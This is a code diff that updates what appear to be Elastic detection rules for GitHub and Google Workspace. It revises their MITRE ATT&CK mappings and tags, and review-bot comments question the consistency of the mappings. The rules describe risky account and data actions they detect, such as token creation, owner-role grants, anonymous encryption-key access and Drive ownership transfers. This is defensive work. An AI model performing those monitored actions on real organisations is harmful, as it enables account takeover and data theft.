- "Use Case: Threat Detection",
- "Tactic: Impact",
- "Tactic: Exfiltration",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -94,34 +87,16 @@ from logs-github.audit-* metadata _id, _index, _version
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1020"
-name = "Automated Exfiltration"
-reference = "https://attack.mitre.org/techniques/T1020/"
-
-[[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1567.001"
-name = "Exfiltration to Code Repository"
-reference = "https://attack.mitre.org/techniques/T1567/001/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml
index 3273c4e208e..107dfb8e0bc 100644
--- a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml
+++ b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/16"
 integration = ["github"]
 maturity = "production"
-updated_date = "2026/01/12"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -55,14 +55,7 @@ references = [
 risk_score = 47
 rule_id = "8bd1c36a-2c4f-4801-a43d-ba696c13ffc2"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Impact",
- "Tactic: Exfiltration",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -95,34 +88,16 @@ from logs-github.audit-* metadata _id, _index, _version
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1020"
-name = "Automated Exfiltration"
-reference = "https://attack.mitre.org/techniques/T1020/"
-
-[[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1567.001"
-name = "Exfiltration to Code Repository"
-reference = "https://attack.mitre.org/techniques/T1567/001/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml
index 46a8c27fb5d..b7651ea38de 100644
--- a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml
+++ b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml
@@ -4,7 +4,7 @@ integration = ["github"]
 maturity = "production"
 min_stack_comments = "mv_contains ES|QL function only available post 9.2 in tech preview"
 min_stack_version = "9.2.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -57,14 +57,7 @@ references = [
 risk_score = 47
 rule_id = "0428c618-27f5-4d94-99e6-b254585aba69"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Impact",
- "Tactic: Exfiltration",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -103,30 +96,17 @@ id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1020"
-name = "Automated Exfiltration"
-reference = "https://attack.mitre.org/techniques/T1020/"
-
 [[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
 [[rule.threat.technique.subtechnique]]
-id = "T1567.001"
-name = "Exfiltration to Code Repository"
-reference = "https://attack.mitre.org/techniques/T1567/001/"
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
 [rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
index 59d99cbea86..6d017e6ec64 100644
--- a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
+++ b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/09"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
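Review bot: In the `-103,30 +96,17` hunk `impact_high_number_of_protected_branch_force_pushes_by_user.toml` keeps T1485 `Data Destruction` (the context lines at the top of the hunk) and adds T1565 / T1565.001 beside it, whereas the two sibling rules changed just above (`impact_high_number_of_closed_pull_requests_by_user.toml`, `impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml`) replace T1485 with T1565. That may well be deliberate, since a successful force push to a protected branch can discard history while a failed attempt or a closed PR cannot, but nothing in the diff records the reasoning; one sentence in the PR description would stop a later cleanup from "harmonizing" the three. This hunk starts mid-table: its first context line is `name = "Data Destruction"`, so the enclosing `[[rule.threat.technique]]` header is outside the hunk.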
@@ -65,14 +65,7 @@ references = [
 risk_score = 21
 rule_id = "03245b25-3849-4052-ab48-72de65a82c35"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Initial Access",
- "Tactic: Persistence",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Initial Access", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -84,32 +77,39 @@ event.dataset: "github.audit" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1195"
-name = "Supply Chain Compromise"
-reference = "https://attack.mitre.org/techniques/T1195/"
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
 [[rule.threat.technique.subtechnique]]
-id = "T1195.002"
-name = "Compromise Software Supply Chain"
-reference = "https://attack.mitre.org/techniques/T1195/002/"
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1195"
+name = "Supply Chain Compromise"
+reference = "https://attack.mitre.org/techniques/T1195/"
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique.subtechnique]]
+id = "T1195.001"
+name = "Compromise Software Dependencies and Development Tools"
+reference = "https://attack.mitre.org/techniques/T1195/001/"
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["github.org_id", "github.repo"]
diff --git a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml
index 15f2ba57bd8..4e702825bc4 100644
--- a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml
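Review bot: The `-84,32 +77,39` hunk moves the Initial Access mapping of `initial_access_github_actions_bot_first_push_to_repo.toml` from T1195.002 to T1195.001 `Compromise Software Dependencies and Development Tools`, and `initial_access_github_register_self_hosted_runner.toml` below makes the same switch, while `initial_access_github_actions_workflow_injection_blocked.toml` keeps T1195.002 `Compromise Software Supply Chain`. Judging by their names all three concern the CI pipeline rather than a shipped dependency, so the split between the two sub-techniques reads as a judgement call that the diff does not explain; if the distinction is that runner registration and bot pushes alter the build tooling itself, a sentence in the PR description saying so would help, otherwise aligning the three on one sub-technique avoids the rules disagreeing with each other. The new `Tactic: Impact`, `Tactic: Initial Access` order in the tags hunk above does match the order of the rebuilt threat entries.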
+++ b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml
@@ -2,7 +2,7 @@ creation_date = "2025/12/05"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -58,15 +58,7 @@ references = ["https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attac
 risk_score = 47
 rule_id = "e8b37f18-4804-4819-8602-4aba1169c9f4"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Use Case: Threat Detection",
- "Tactic: Initial Access",
- "Tactic: Persistence",
- "Tactic: Execution",
- "Data Source: Github",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -84,41 +76,30 @@ from logs-github.audit-* metadata _id, _index, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1195.002"
 name = "Compromise Software Supply Chain"
 reference = "https://attack.mitre.org/techniques/T1195/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml
index 5b6539b9114..9b48a818df9 100644
--- a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml
+++ b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml
@@ -2,7 +2,7 @@ creation_date = "2025/11/28"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/12/09"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -73,23 +73,21 @@ event.dataset:"github.audit" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1195"
 name = "Supply Chain Compromise"
 reference = "https://attack.mitre.org/techniques/T1195/"
-[[rule.threat.technique.subtechnique]]
-id = "T1195.002"
-name = "Compromise Software Supply Chain"
-reference = "https://attack.mitre.org/techniques/T1195/002/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1195.001"
+name = "Compromise Software Dependencies and Development Tools"
+reference = "https://attack.mitre.org/techniques/T1195/001/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["user.name", "github.actor_ip"]
diff --git a/rules/integrations/github/persistence_github_org_owner_added.toml b/rules/integrations/github/persistence_github_org_owner_added.toml
index 6ebccba2979..1d8e0678699 100644
--- a/rules/integrations/github/persistence_github_org_owner_added.toml
+++ b/rules/integrations/github/persistence_github_org_owner_added.toml
@@ -2,7 +2,7 @@ creation_date = "2023/09/11"
 integration = ["github"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -54,14 +54,7 @@ GitHub organizations allow collaborative management of repositories, where the ' risk_score = 47 rule_id = "24401eca-ad0b-4ff9-9431-487a8e183af9" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Persistence", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -72,19 +65,36 @@ iam where event.dataset == "github.audit" and event.action == "org.add_member" a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/integrations/github/persistence_new_pat_created.toml b/rules/integrations/github/persistence_new_pat_created.toml index ff972644a35..1b24e4314f7 100644 --- a/rules/integrations/github/persistence_new_pat_created.toml +++ b/rules/integrations/github/persistence_new_pat_created.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,14 +54,7 @@ references = [ risk_score = 21 rule_id = "214d4e03-90b0-4813-9ab6-672b47158590" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Credential Access", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -73,29 +66,16 @@ github.category == "personal_access_token" and event.action == "personal_access_ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/github/persistence_organization_owner_role_granted.toml b/rules/integrations/github/persistence_organization_owner_role_granted.toml index c8b2b1f0fc5..b32268406c6 100644 --- a/rules/integrations/github/persistence_organization_owner_role_granted.toml +++ b/rules/integrations/github/persistence_organization_owner_role_granted.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -52,14 +52,7 @@ In GitHub organizations, the owner role grants comprehensive administrative priv risk_score = 47 rule_id = "9b343b62-d173-4cfd-bd8b-e6379f964ca4" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Persistence", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -70,19 +63,36 @@ iam where event.dataset == "github.audit" and event.action == "org.update_member [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml index 8b50df9d34a..05da7b7543b 100644 --- a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml 
+++ b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/24" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,12 +84,7 @@ references = [ risk_score = 47 rule_id = "07b5f85a-240f-11ed-b3d9-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: Google Workspace", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -101,19 +96,13 @@ event.dataset:"google_workspace.admin" and event.action:"CREATE_DATA_TRANSFER_RE [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" -[[rule.threat.technique.subtechnique]] -id = "T1074.002" -name = "Remote Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/002/" - +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml index 36138972133..cb72f43152f 100644 --- a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml 
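Review bot: The tactic for collection_google_drive_ownership_transferred_via_google_workspace.toml moves from Collection (TA0009) to Exfiltration (TA0010) in the `[rule.threat.tactic]` hunk, but the file keeps its `collection_` prefix. If this repository's convention ties the filename prefix to the rule's primary tactic, the file should be renamed in the same change; the same question applies to impact_google_workspace_mfa_enforcement_disabled.toml (now Credential Access/Defense Evasion), initial_access_external_user_added_to_google_workspace_group.toml and initial_access_google_workspace_suspended_user_renewed.toml (now Persistence), initial_access_object_copied_to_external_drive_with_app_consent.toml (now Execution/Persistence) and persistence_google_workspace_password_policy_modified.toml (now Defense Evasion). If the prefix is only historical, one line in the PR description saying so would spare the next reader the same check.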
+++ b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,13 +80,7 @@ references = [ risk_score = 73 rule_id = "980b70a0-c820-11ed-8799-f661ea17fbcc" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -102,19 +96,31 @@ file where event.dataset == "google_workspace.drive" and event.action : ("copy", [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml index ba8f4a4f7f8..664b19c5d94 100644 
--- a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml +++ b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,19 +107,13 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.type:" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml index 50b9fd776ed..fec6ad8c4e3 100644 --- a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml +++ b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -99,19 +99,13 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml index 09ecde61c16..a0a8211ec53 100644 --- a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml +++ b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
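Review bot: The trusted-domains rule now maps to the parent T1484 only after dropping the T1562.007 subtechnique, yet adding a domain to the trusted list is the direct case of the Trust Modification subtechnique, `id = "T1484.002"`. Consider adding a `[[rule.threat.technique.subtechnique]]` block for it under the T1484 entry, with the name and reference strings taken from the ATT&CK version this repo validates against, since the tactic/technique correlation test in tests/test_all_rules.py will check them. The sibling hunks for the blocklist and marketplace rules are reasonably left at the parent T1484, as neither of its subtechniques fits those settings changes.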
@@ -108,19 +108,13 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml index 5c62a0f8be1..04e49aa2abd 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,13 +84,7 @@ references = [ risk_score = 47 rule_id = "cad4500a-abd7-4ef3-b5d3-95524de7cfe1" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Impact", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
